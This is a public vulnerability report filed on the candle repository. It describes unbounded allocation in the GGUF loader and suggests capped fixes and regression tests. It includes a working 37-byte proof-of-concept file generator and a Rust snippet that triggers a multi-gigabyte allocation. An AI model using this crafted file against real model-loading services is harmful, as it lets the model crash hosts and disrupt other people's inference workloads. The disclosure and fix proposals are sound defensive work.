Unguarded allocation sites in candle-core/src/quantized/gguf_file.rs (DoS via crafted GGUF) #3533

@UNILESS

Filing this publicly because the repo does not currently have Private Vulnerability Reporting enabled. Happy to move to a private channel if preferred — please enable PVR on the repo and let me know.

Summary

candle-core/src/quantized/gguf_file.rs (current main, commit 24b0b28+) reads several length / count fields from a GGUF file as u32/u64 and uses them directly as the size argument of vec![T; n], Vec::with_capacity(n), and for _ in 0..n loops with no upper-bound check. A small (< 64-byte) GGUF file that declares 2^32 items drives the loader into multi-GB allocation or extremely long iteration, killing the host or its inference workload.

Same bug class as CVE-2025-66960 (ollama fs/ggml/gguf.go, fixed). In candle, the same pattern recurs across five sites. The sibling crate safetensors in the same org explicitly caps with MAX_HEADER_SIZE + buffer.get slicing — candle's GGUF loader did not adopt that pattern.

Affected sites

All in candle-core/src/quantized/gguf_file.rs:

(a) L99 — read_string length buffer:

let len = match magic {
    VersionedMagic::GgufV1 => reader.read_u32::<LittleEndian>()? as usize,
    VersionedMagic::GgufV2 | VersionedMagic::GgufV3 => {
        reader.read_u64::<LittleEndian>()? as usize
    }
};
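let mut v = vec![0u8; len];        // <-- requests `len` zeroed bytes before any data is read
reader.read_exact(&mut v)?;

vec![0u8; len] requests the full `len` bytes up front, before the reader has shown that the data exists. len = 2^32 → a 4 GB allocation request. Whether those pages are backed by physical memory immediately depends on the allocator and OS (zeroed allocations may be committed lazily), but a request that cannot be satisfied aborts the process instead of returning Err.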
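One way to avoid trusting the declared length at all is to let the buffer grow only as bytes actually arrive. The following is a minimal std-only sketch, not candle's code: the function name `read_len_prefixed` and the cap `MAX_STRING_LEN` are hypothetical, and it assumes the u64 length prefix used by GGUF v2/v3.

```rust
use std::io::{self, Read};

/// Hypothetical cap for illustration; not a value taken from candle.
const MAX_STRING_LEN: u64 = 1 << 26;

/// Reads a little-endian u64 length prefix followed by that many bytes.
fn read_len_prefixed<R: Read>(reader: &mut R) -> io::Result<Vec<u8>> {
    let mut len_bytes = [0u8; 8];
    reader.read_exact(&mut len_bytes)?;
    let len = u64::from_le_bytes(len_bytes);
    if len > MAX_STRING_LEN {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("string length {len} exceeds max {MAX_STRING_LEN}"),
        ));
    }
    // `take` limits the read to `len` bytes and `read_to_end` grows the
    // buffer as data arrives, so a truncated file never causes a
    // `len`-sized allocation.
    let mut buf = Vec::new();
    reader.by_ref().take(len).read_to_end(&mut buf)?;
    if buf.len() as u64 != len {
        return Err(io::Error::new(
            io::ErrorKind::UnexpectedEof,
            "string shorter than its declared length",
        ));
    }
    Ok(buf)
}
```

With this shape the explicit cap becomes a second line of defence: even a length just under the cap costs no more memory than the bytes the file really contains.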

(b) L306 — Value::read ARRAY branch:

let len = match magic { ... };
let mut vs = Vec::with_capacity(len);
for _ in 0..len {
    vs.push(Value::read(reader, value_type, magic)?)
}
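For the array branch, an element-count cap alone may still allow a large reservation, because each element is bigger than one byte. A complementary approach is to bound only the up-front reservation and let the vector grow as elements are successfully parsed. A minimal sketch under that assumption follows; `read_array`, `read_one`, and `MAX_PREALLOC` are hypothetical names, not candle APIs.

```rust
/// Hypothetical bound on how many elements are reserved up front.
const MAX_PREALLOC: usize = 1024;

/// Collects `declared_len` elements produced by `read_one`, reserving at
/// most `MAX_PREALLOC` slots before any element has been parsed.
fn read_array<T, E>(
    declared_len: usize,
    mut read_one: impl FnMut() -> Result<T, E>,
) -> Result<Vec<T>, E> {
    let mut vs = Vec::with_capacity(declared_len.min(MAX_PREALLOC));
    for _ in 0..declared_len {
        // Each element consumes input, so a truncated file fails here
        // with the reader's error long before `declared_len` is reached.
        vs.push(read_one()?);
    }
    Ok(vs)
}
```

The loop bound is still attacker-controlled, but every iteration must consume real bytes, so the work done is proportional to the file size rather than to the declared count.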

(c) L421 — tensor_count outer loop:

let tensor_count = ... reader.read_u64::<LittleEndian>()? as usize;
for _idx in 0..tensor_count {
    let tensor_name = read_string(reader, &magic)?;
    ...
}

(d) L413 — metadata_kv_count: Same shape as (c).

(e) L427 / L432 — tensor dimensions vector:

let n_dimensions = reader.read_u32::<LittleEndian>()?;
let mut dimensions = vec![0; n_dimensions as usize];    // <-- alloc
reader.read_u32_into::<LittleEndian>(&mut dimensions)?;

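The element type is inferred from the read call, so the path shown allocates a Vec<u32> (4 bytes/element, ~16 GB for n_dimensions = 2^32 − 1). Where dimensions are read as 64-bit values (GGUF v2/v3), elements are 8 bytes and the same n_dimensions yields a ~32 GB request.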
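A gate for this site can be sketched as follows, using only std. `read_dims` and `MAX_DIMS` are hypothetical; the value 8 simply mirrors the GGUF_MAX_TENSOR_DIMS proposed in this issue, and the 64-bit dimension width assumes the GGUF v2/v3 layout.

```rust
use std::io::{self, Read};

/// Hypothetical cap; mirrors the GGUF_MAX_TENSOR_DIMS value proposed here.
const MAX_DIMS: usize = 8;

/// Reads a u32 dimension count followed by that many u64 dimensions.
fn read_dims<R: Read>(reader: &mut R) -> io::Result<Vec<usize>> {
    let mut n = [0u8; 4];
    reader.read_exact(&mut n)?;
    let n_dimensions = u32::from_le_bytes(n) as usize;
    // Reject the count before it is used as an allocation size.
    if n_dimensions > MAX_DIMS {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("n_dimensions {n_dimensions} exceeds max {MAX_DIMS}"),
        ));
    }
    let mut dims = Vec::with_capacity(n_dimensions);
    for _ in 0..n_dimensions {
        let mut d = [0u8; 8];
        reader.read_exact(&mut d)?;
        let d = u64::from_le_bytes(d);
        // Guard the narrowing cast on 32-bit targets.
        if d > usize::MAX as u64 {
            return Err(io::Error::new(
                io::ErrorKind::InvalidData,
                "dimension does not fit in usize",
            ));
        }
        dims.push(d as usize);
    }
    Ok(dims)
}
```

Because the cap is tiny, the subsequent `with_capacity` is bounded to a few dozen bytes regardless of what the file declares.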

Reachability

gguf_file::Content::read is the canonical entry for loading any GGUF model. Any application that loads a user-supplied or hub-downloaded GGUF traverses these sites.

Minimal PoC — 37 bytes

Generate the file (Python):

import struct

malicious = (
    b'GGUF'                              # magic
    + struct.pack('<I', 3)               # version = 3
    + struct.pack('<Q', 1)               # tensor_count = 1
    + struct.pack('<Q', 0)               # kv_count = 0
    + struct.pack('<Q', 1) + b't'        # name = 't'
    + struct.pack('<I', 0xFFFFFFFF)      # n_dimensions = 2^32 - 1
)
assert len(malicious) == 37
with open('/tmp/evil.gguf', 'wb') as f:
    f.write(malicious)

Load it (Rust):

use candle_core::quantized::gguf_file;
use std::fs::File;

fn main() {
    let mut f = File::open("/tmp/evil.gguf").unwrap();
    // Requests a dimensions vector of 2^32 - 1 elements (~32 GB at 8 bytes each).
    let _ = gguf_file::Content::read(&mut f);
}

Suggested fix

Mirror the safetensors pattern. Define caps and gate each allocation:

const GGUF_MAX_ARRAY_ELEMENTS: usize = 1 << 30;
const GGUF_MAX_STRING_LENGTH:  usize = 1 << 26;
const GGUF_MAX_TENSOR_DIMS:    usize = 8;

fn read_string<R: Read>(reader: &mut R, magic: &VersionedMagic) -> Result<String> {
    let len = ...;
    if len > GGUF_MAX_STRING_LENGTH {
        crate::bail!("GGUF string length {len} exceeds max {GGUF_MAX_STRING_LENGTH}")
    }
    let mut v = vec![0u8; len];
    reader.read_exact(&mut v)?;
    ...
}

Equivalent gates are needed at L306, L413, L421, and L427/L432. The C++ baseline ggml/src/gguf.cpp enforces the same caps after PR ggml-org/llama.cpp#19856.

Regression tests should cover each site with an oversized value and assert that the parser returns Err (not OOM).
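As a starting point for such a test, the PoC bytes can be built directly in Rust so the test needs no external file. This is a sketch only: `evil_gguf_dims` is a hypothetical helper, and the commented-out assertion assumes `Content::read` accepts a `std::io::Cursor`, which has not been checked against candle here.

```rust
/// Builds the 37-byte file from the PoC (GGUF v3, one tensor, no metadata,
/// oversized n_dimensions).
fn evil_gguf_dims() -> Vec<u8> {
    let mut buf = Vec::new();
    buf.extend_from_slice(b"GGUF");                 // magic
    buf.extend_from_slice(&3u32.to_le_bytes());     // version = 3
    buf.extend_from_slice(&1u64.to_le_bytes());     // tensor_count = 1
    buf.extend_from_slice(&0u64.to_le_bytes());     // kv_count = 0
    buf.extend_from_slice(&1u64.to_le_bytes());     // name length = 1
    buf.push(b't');                                 // name = "t"
    buf.extend_from_slice(&u32::MAX.to_le_bytes()); // n_dimensions = 2^32 - 1
    buf
}

// Inside candle's own test suite (assumed, not compiled here) the check
// could look like:
//
//     let mut cursor = std::io::Cursor::new(evil_gguf_dims());
//     assert!(gguf_file::Content::read(&mut cursor).is_err());
```

Analogous builders for the other sites would vary only the field that carries the oversized value (string length, array length, tensor_count, metadata_kv_count).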

CWE

  • CWE-770 (Allocation of Resources Without Limits or Throttling)
  • CWE-1284 (Improper Validation of Specified Quantity in Input)
  • CWE-400 (Uncontrolled Resource Consumption)

CVE

If a CVE assignment is in scope here, happy to coordinate.
